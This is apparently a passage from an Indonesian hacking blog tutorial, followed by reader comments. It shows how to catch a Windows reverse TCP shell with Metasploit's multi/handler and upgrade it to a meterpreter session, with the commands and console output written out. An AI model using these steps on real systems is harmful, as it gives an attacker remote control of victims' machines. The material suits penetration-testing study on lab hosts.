Dengan payload ini, attacker dapat membuka sesi shell. Sayang sekali jika kita tidak dapat membuat sesi meterpreter. Namun tenang dulu, kita masih bisa melakukan upgrade sesi kita menjadi sesi meterpreter.
Dalam kasus ini, saya menggunakan exploit/multi/handler dengan payload windows/shell_reverse_tcp, IP address saya 10.10.1.1 dan melakukan listening pada port 4444.
Sesaat kemudian, shell sesi pertama terbuka.
Bagaimana cara membuat sesi ini menjadi meterpreter?
Cukup masukan perintah berikut
Command :
msf exploit(handler) > sessions -u 2 -q
Maka akan muncul seperti ini.
Command :
msf exploit(handler) > sessions -u 2 -q
[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
...
<snip>
...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(handler) > [*] Meterpreter session 3 opened (10.10.1.1:4444 -> 10.10.1.128:1048) at 2012-06-08 10:56:08 +0700
Kemudian cek ID sesi meterpreter dengan perintah
Command :
msf exploit(handler) > sessions -l -v
Terlihat bahwa ID sesi meterpreter adalah 3. Selanjutnya kita akses meterpreter dengan perintah.
Command :
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter >
You are so.....
Pwned by : red-dragon
bagus artikelnya
ReplyDeletehttp://area-hacking.blogspot.com/
silahkan mampir yah masbro
Bang boleh request ga? cara rooting dari yang paling basic? soalnya dari kemarin nyari ga nemu juga :) tq sebelumnya
ReplyDelete